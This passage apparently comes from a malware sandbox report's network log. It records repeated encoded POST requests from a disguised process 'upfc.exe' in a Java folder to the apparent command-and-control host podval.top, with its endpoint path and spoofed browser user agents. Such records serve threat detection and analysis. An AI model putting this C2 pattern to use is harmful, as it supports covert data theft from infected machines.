                                                    Jul 3, 2024 16:43:15.611356974 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:15.950858116 CEST724INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUpwbbXchEX%2BfzmP7w7rFtUtA8KB18SDPFGpsiE1puN2mgm2JNpbNThAX7SgEP2Q2XL2N7u8JdG7xXH9c%2FL6kHabcIlZCznXyOPK72wf2hUMa4%2FdAyn0JimenjXC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a59649ad7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 58 32 04 35 59 25 21 23 50 2d 03 01 51 29 3d 05 07 3b 39 39 5f 2b 37 36 01 39 2d 22 54 20 04 25 02 28 12 24 5c 26 56 2f 0f 22 31 20 5b 04 1c 23 5b 28 03 2d 12 29 38 09 56 26 02 3e 1f 30 37 21 13 33 05 07 0c 30 06 37 12 2b 16 1c 0f 33 0c 24 02 29 3b 3a 5b 2b 27 0b 00 21 1e 21 54 02 13 21 0d 24 3d 26 0c 23 30 27 53 25 20 1b 14 33 1a 33 53 27 55 29 0e 3e 33 2a 57 24 57 28 5b 36 3f 34 0e 33 3b 3d 03 26 2e 39 1f 23 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98%X25Y%!#P-Q)=;99_+769-"T %($\&V/"1 [#[(-)8V&>07!307+3$);:[+'!!T!$=&#0'S% 33S'U)>3*W$W([6?43;=&.9#8#_+)V3YT
                                                    Jul 3, 2024 16:43:17.088772058 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:17.183898926 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.521200895 CEST731INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTBknzdhqx0hClSD%2BTjhc4AhedhR37tWQPc0E0N%2BXesxtdq2bmkLBYwysHZNWhKBrRvWbiq2m6pIqMuhGfY1k2%2BgNfvtylsOMM4cmEGQ9OVMXMS86yiIAWp%2FyJg5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a01d917cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 01 26 39 31 58 25 32 0e 09 2e 3d 3b 1b 3c 2e 27 05 38 29 03 17 2a 24 25 58 39 3d 22 54 23 39 29 07 2b 12 34 58 26 33 24 50 23 31 20 5b 04 1c 23 5d 28 14 07 12 28 2b 33 54 31 2f 31 05 27 0e 3d 5d 30 05 2e 1f 33 06 27 5c 3d 28 35 55 27 1c 33 1e 3e 06 07 02 28 51 2e 59 35 24 21 54 02 13 22 51 30 2d 31 1c 37 1e 38 0e 32 0e 18 05 27 0a 38 0a 33 30 22 1f 2a 33 25 0d 30 0f 28 1e 36 3f 34 0c 26 2b 26 5e 30 04 21 5d 21 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&91X%2.=;<.'8)*$%X9="T#9)+4X&3$P#1 [#]((+3T1/1'=]0.3'\=(5U'3>(Q.Y5$!T"Q0-1782'830"*3%0(6?4&+&^0!]!#_+)V3YT0
                                                    Jul 3, 2024 16:43:18.526547909 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:18.666819096 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:19.165853024 CEST731INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqxUGcEu%2BLNWYyOUQqLFLgXXMjyHodjsVeqLuTpCgbYVT0jGOH0v3n%2FqqDz3uvCw7e8fgeDC8l3M%2BdhpP8vFsixikvqqwdGZA8YD0%2F0ol1QFaxFJVZ3YBdAn8MOF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a93fd37cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 25 04 25 1e 25 0c 27 54 2e 5b 23 52 2b 13 24 5c 2d 29 35 17 3f 1a 0b 13 3a 3e 0b 09 34 5c 32 5e 28 3f 33 01 24 33 27 0e 21 31 20 5b 04 1c 20 03 3f 04 3d 5f 3f 5e 37 56 32 3f 2e 19 24 24 3d 13 30 02 32 1c 30 06 2f 11 3c 28 26 0d 27 21 3b 5c 3d 38 3a 5f 3f 09 2d 00 36 1e 21 54 02 13 21 08 25 3d 36 0e 37 09 20 0c 26 33 3d 58 24 34 38 0b 24 33 25 0e 29 0a 36 53 24 1f 1d 05 36 2f 28 0f 33 06 2a 5b 24 2d 0f 5d 22 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%%%'T.[#R+$\-)5?:>4\2^(?3$3'!1 [ ?=_?^7V2?.$$=020/<(&'!;\=8:_?-6!T!%=67 &3=X$48$3%)6S$6/(3*[$-]"#_+)V3YT0
                                                    Jul 3, 2024 16:43:20.171363115 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:20.272322893 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:20.653573036 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSY6JRVUiCXKoa948vC%2Fx0r58efCUnapMOx%2F05bvml6FQ9Nx127VxV%2Fy8fVaOTQa6CP4DyeN3mJIMoAOp7AER6Ar6Z29a0w5Q02uhecApX5kSMo21rrd0DZorBHk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5b36b047cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 05 31 3a 2d 5a 25 22 20 0d 39 2e 3b 50 29 3d 3c 5c 3b 5f 35 5e 3f 34 21 10 2e 3d 2e 53 23 2a 36 5b 3c 02 38 14 25 09 24 54 22 31 20 5b 04 1c 23 5d 3f 14 0f 5b 29 38 2f 52 31 3c 3e 19 27 19 22 02 24 05 32 52 25 3b 3b 5d 3c 06 35 1d 33 32 2c 05 3d 06 21 06 2a 37 08 5f 21 1e 21 54 02 13 22 54 30 2d 3a 0d 21 33 3b 55 25 1e 1b 5c 33 1d 24 0a 30 0a 22 1e 2a 0a 26 55 27 57 3c 5b 23 3c 2b 1d 30 06 3a 5b 27 2e 31 11 21 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&1:-Z%" 9.;P)=<\;_5^?4!.=.S#*6[<8%$T"1 [#]?[)8/R1<>'"$2R%;;]<532,=!*7_!!T"T0-:!3;U%\3$0"*&U'W<[#<+0:['.1!#_+)V3YT0
                                                    Jul 3, 2024 16:43:21.667474031 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:21.761843920 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:22.102695942 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hflJuVRMcfHBvX%2FCBYftUEfufKdHBXSj0xcQmMdpOPw%2BkFbBF8FFWA2TAE62B4XSy7wWAy1Js79AayEahxBnAWH2QH7BPYb0pB%2Bnm9TDhhPmptkqEbYLNV0lusoF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5bcbcef7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 26 04 2a 02 24 22 0a 08 2d 13 24 0a 28 03 2c 5e 2c 00 2a 06 2b 0a 0f 5c 3a 00 25 08 37 2a 04 5b 2b 2f 24 5e 26 30 30 1d 21 1b 20 5b 04 1c 20 02 3c 3a 21 5a 3f 16 2c 0a 26 2f 29 41 33 0e 35 5b 26 3b 2d 0d 27 16 38 02 3c 01 22 0f 24 0c 09 5c 3e 01 26 5e 28 51 2e 13 35 34 21 54 02 13 22 54 33 5b 22 0f 37 56 27 53 25 23 36 00 33 24 37 53 24 30 3e 52 3d 0a 39 0e 30 31 3c 5a 22 3c 28 0f 27 06 2a 16 24 5b 39 5c 23 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%&*$"-$(,^,*+\:%7*[+/$^&00! [ <:!Z?,&/)A35[&;-'8<"$\>&^(Q.54!T"T3["7V'S%#63$7S$0>R=901<Z"<('*$[9\#(#_+)V3YT0
                                                    Jul 3, 2024 16:43:23.104619980 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:23.199186087 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:23.548437119 CEST724INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVgKbCGpzej4svb05tczry6NarZIo%2Fu8vdLftrhituXhIOf5UgaKxlqM1Ng%2FIEUq%2BdCj1rCsIbmytU96Zyfwy5XVv24nQl5ViJihEShUH9LuRQEty4lociu9jaQO"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5c5be7e7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5e 25 04 21 5d 31 31 30 09 2e 13 38 0a 3c 3e 2b 07 2f 29 31 14 3f 34 00 02 39 3d 36 55 22 29 36 5b 3c 3c 38 5c 25 30 20 1d 21 0b 20 5b 04 1c 20 05 3c 03 22 03 3f 01 24 0b 26 3c 22 1f 27 24 39 5d 24 5d 3e 52 25 28 05 5a 3c 16 14 08 27 54 3c 05 2a 3b 32 5f 3f 0e 31 03 20 34 21 54 02 13 21 08 27 03 29 1f 23 20 38 0e 26 1e 3d 5e 27 37 2b 53 27 23 25 0e 3e 0a 29 0d 27 32 23 01 23 2c 37 54 33 38 2e 16 33 3d 3d 5c 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98%^%!]110.8<>+/)1?49=6U")6[<<8\%0 ! [ <"?$&<"'$9]$]>R%(Z<'T<*;2_?1 4!T!')# 8&=^'7+S'#%>)'2##,7T38.3==\!(#_+)V3YT
                                                    Jul 3, 2024 16:43:24.683429003 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:24.780395985 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:25.071371078 CEST731INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gtEJxUpRFxX%2BFcXas6GsrTeAUmHL7BNXd9W9ZZXiQCwBO9tLa9FMEEhoOz665VysXBdurNQqdBYVewfTcsNB8qVeCehvP6zfGq1%2FNy2sWGDzZAD%2Boy4aVeqEUxG%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5cf99377cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 04 26 2a 2d 5c 31 31 23 52 3a 5b 2f 52 3f 03 01 05 2d 29 21 19 3c 1d 35 10 2e 10 26 1b 22 2a 36 16 3f 2f 24 1b 31 0e 38 1d 22 0b 20 5b 04 1c 23 10 3c 5c 31 12 3f 38 28 0c 31 2c 31 0a 33 51 29 5c 24 05 3a 53 30 38 24 01 3f 01 22 08 24 1c 01 10 3d 01 3e 59 3f 34 3a 59 20 24 21 54 02 13 22 1d 33 03 3d 11 20 1e 24 0a 31 30 3d 59 30 24 38 09 24 55 22 1f 28 23 25 0e 27 32 3f 00 22 2c 20 0d 30 38 0f 04 27 3d 31 5c 36 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&*-\11#R:[/R?-)!<5.&"*6?/$18" [#<\1?8(1,13Q)\$:S08$?"$=>Y?4:Y $!T"3= $10=Y0$8$U"(#%'2?", 08'=1\6(#_+)V3YT0
                                                    Jul 3, 2024 16:43:26.073241949 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:26.337582111 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:26.674227953 CEST737INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Pr66bOduS0lsrF1M2mgPFPB6xOg81G3Oexttz5LFxjYc9SDXvQ7qH92v4Z%2BMN%2BvrCls1SjKVZopj6Fe890XPqU%2BCGA%2BHVpxF%2FsxsGCuLBSiuUF%2FEwVnhV%2BtfZO4"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5d95cde7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 05 26 2a 2a 01 31 22 01 52 2e 04 33 53 29 2e 2b 05 2c 39 31 5f 3c 24 25 59 39 2d 29 0a 23 5c 35 04 28 05 28 14 26 33 2c 50 21 31 20 5b 04 1c 23 5b 3c 03 32 07 28 16 30 0a 24 3f 31 0a 30 24 3a 00 27 2b 2a 1e 27 28 2b 5b 2b 16 36 0e 26 22 28 02 2b 3b 2e 59 3c 19 2e 5f 21 0e 21 54 02 13 22 1c 33 13 1c 0f 23 0e 27 56 31 09 29 59 27 0a 09 53 33 30 21 0d 3d 0a 29 0a 27 1f 15 03 35 06 20 0d 27 16 22 5a 30 04 31 1f 36 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&**1"R.3S).+,91_<$%Y9-)#\5((&3,P!1 [#[<2(0$?10$:'+*'(+[+6&"(+;.Y<._!!T"3#'V1)Y'S30!=)'5 '"Z0168#_+)V3YT0
                                                    Jul 3, 2024 16:43:27.686592102 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:27.782900095 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:28.074255943 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dL3JsC%2FqmzCLvdvcIo8Myh19xMnBu5RcuRjMYF%2BaQj0Kt6xXaP%2FkXpZBddu8MXcrmTu8qCogIsbLuD0JV6p%2FtCa9G8ssFre5Hwa6RiLgE%2FAoklPYlpqsvlItQAgd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e25fe87cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5c 25 5c 3d 59 25 21 3c 0d 2e 13 2b 14 29 2d 28 59 38 07 08 04 2b 1a 29 1e 3a 3e 04 19 23 14 00 15 2b 2f 2b 04 32 56 2f 0e 35 1b 20 5b 04 1c 20 02 28 5c 31 5b 3f 06 09 1e 31 2f 31 0b 30 34 26 01 26 2b 32 1f 30 38 0a 02 3f 3b 2a 08 30 31 3f 1e 3e 28 31 03 3f 24 31 03 22 0e 21 54 02 13 21 0e 33 3e 22 0d 37 0e 02 0d 32 30 3e 06 24 1d 3b 53 30 23 2a 1f 3d 0d 36 1d 27 31 27 00 21 01 20 0a 27 3b 3e 5f 33 04 2d 10 21 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%\%\=Y%!<.+)-(Y8+):>#+/+2V/5 [ (\1[?1/104&&+208?;*01?>(1?$1"!T!3>"720>$;S0#*=6'1'! ';>_3-!#_+)V3YT0
                                                    Jul 3, 2024 16:43:29.088962078 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:29.184120893 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:29.522166014 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FtpC1OzM3nzkBwz5hKmQG%2FJ4dVbBGtBENlt2CMy%2F2r%2BSwcCd%2FiFYCRGQmRofPrzEsXlzVM73zLiMXSOMpJdeqMAELOmhT%2Fb7D0Sd1lGad3DrqIKIPqK1OJ4Kx65x"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5eb1a687cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 06 25 2a 0f 5c 32 1c 0e 0c 2e 04 3b 53 2b 04 3b 04 2c 00 29 5b 28 37 21 5b 3a 3d 36 50 23 14 25 04 2b 2f 30 16 26 20 02 56 35 1b 20 5b 04 1c 20 05 2b 04 03 5e 29 28 2f 11 31 02 31 08 30 27 31 1e 26 38 2d 0b 25 2b 3c 02 2b 3b 2a 0e 24 32 3f 13 3d 16 2d 00 28 34 2a 59 36 34 21 54 02 13 21 08 33 5b 39 56 23 0e 0d 57 25 20 3e 05 30 27 30 0a 27 23 2a 55 29 33 26 53 30 31 16 58 21 11 2c 0f 27 16 3d 02 26 2d 31 5c 21 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&%*\2.;S+;,)[(7![:=6P#%+/0& V5 [ +^)(/110'1&8-%+<+;*$2?=-(4*Y64!T!3[9V#W% >0'0'#*U)3&S01X!,'=&-1\!#_+)V3YT0
                                                    Jul 3, 2024 16:43:30.526822090 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:30.621807098 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:30.923676014 CEST793INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9SNz78Ey02TytSt6NlTw26I%2FruUFlDaF9v7M2QoEyftKtG0hzkkaebGQm5Mm9L7C3zye9P4KGlWDA6QpG984BDBJeX3yfBHfuw70s9ipP56R0Em9WusnIisP8M7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f41cd47cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 64 63 0d 0a 09 1a 25 59 25 3a 2e 00 32 32 2b 16 3a 13 2b 52 3f 5b 34 14 38 3a 36 07 2b 42 35 11 3a 58 31 08 20 2a 3d 05 3f 2f 30 5c 32 33 20 1e 36 31 20 5b 04 1c 20 03 3f 29 22 00 3f 01 24 0e 26 2f 3d 43 30 27 32 05 24 5d 2e 53 27 06 0a 04 3c 06 32 0e 26 32 20 03 2a 16 3e 5a 2b 27 22 59 21 0e 21 54 02 13 22 54 27 3d 21 1e 20 1e 27 55 27 33 25 58 30 27 24 0d 33 30 35 0c 29 23 2e 54 27 0f 2b 02 21 2f 37 55 27 06 0f 04 30 3d 31 58 22 38 23 5f 2b 00 07 5a 34 06 1d 39 38 29 11 5c 3c 38 11 2a 0f 29 54 29 3e 31 04 2e 30 58 08 5e 3c 31 20 0b 0e 39 57 30 3c 00 06 0b 3c 2c 1b 1b 3c 3a 19 32 24 06 57 39 3b 09 1e 21 02 07 2e 52 39 05 3e 23 00 5a 00 18 3a 1c 3d 00 0c 3f 57 5f 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: dc%Y%:.22+:+R?[48:6+B5:X1 *=?/0\23 61 [ ?)"?$&/=C0'2$].S'<2&2 *>Z+'"Y!!T"T'=! 'U'3%X0'$305)#.T'+!/7U'0=1X"8#_+Z498)\<8*)T)>1.0X^<1 9W0<<,<:2$W9;!.R9>#Z:=?W_0
                                                    Jul 3, 2024 16:43:31.003087044 CEST269OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 500
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:31.097474098 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:31.390216112 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyyLlEp%2BxcZOrCmIqXiSlzkfkjC9TdbCfbQMCZ7MFvO5vSty0y91iAONN4nCnZSUqX4CdrQPBVILa8Xov0K%2F7NnCeRo%2Ftg8rbvxwQe%2ByoCvQz3%2B3qx0O0TsSgf4I"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f718467cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    68192.168.2.1049786188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:03.091326952 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:03.497622013 CEST1060OUTData Raw: 5f 54 5a 59 5b 5d 57 51 58 56 55 51 50 5b 59 5a 55 5c 5e 5d 51 5b 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _TZY[]WQXVUQP[YZU\^]Q[S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]')00?Y$0(>X.4-:9.&&!X0#/8 7-<"['$Y -
                                                    Jul 3, 2024 16:43:03.570642948 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:03.792402029 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
